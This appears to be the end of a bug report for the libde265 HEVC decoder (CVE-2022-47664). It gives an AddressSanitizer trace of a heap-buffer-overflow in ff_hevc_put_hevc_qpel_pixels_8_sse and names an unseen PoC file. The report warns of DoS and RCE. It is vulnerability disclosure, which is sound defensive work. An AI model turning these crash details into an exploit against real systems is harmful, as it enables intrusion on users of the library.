        #9 0x7f929c7f15a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #10 0x7f929c7e8d49 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfd49)
        #11 0x7f929c7f1f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06)
        #12 0x7f929c7f3c3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f)
        #13 0x7f929c746e6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f)
        #14 0x7f929c747673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673)
        #15 0x7f929c746311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311)
        #16 0x7f929c74605b in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d05b)
        #17 0x7f929c748be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #18 0x7f929c74924c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #19 0x7f929c72f3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #20 0x5613fc1319a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #21 0x7f929c0d7d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #22 0x7f929c0d7e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #23 0x5613fc12f7c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4)
    
    0x61b00000d190 is located 0 bytes to the right of 1552-byte region [0x61b00000cb80,0x61b00000d190)
    allocated by thread T0 here:
        #0 0x7f929ca5755c in __interceptor_posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:226
        #1 0x7f929c78aa61 in ALLOC_ALIGNED(unsigned long, unsigned long) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x181a61)
        #2 0x7f929c78b202 in de265_image_get_buffer(void*, de265_image_spec*, de265_image*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x182202)
        #3 0x7f929c78d66b in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x18466b)
        #4 0x7f929c7709fa in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1679fa)
        #5 0x7f929c749fd4 in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x140fd4)
        #6 0x7f929c74cee1 in decoder_context::process_reference_picture_set(slice_segment_header*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x143ee1)
        #7 0x7f929c75046a in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14746a)
        #8 0x7f929c745970 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13c970)
        #9 0x7f929c748be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #10 0x7f929c74924c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #11 0x7f929c72f3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #12 0x5613fc1319a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #13 0x7f929c0d7d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*)
    Shadow bytes around the buggy address:
      0x0c367fff99e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff99f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c367fff9a30: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff9a40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff9a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff9a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==733371==ABORTING
    

**POC**

660.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47664: heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) · Issue #368 · strukturag/libde265

Tag

#chrome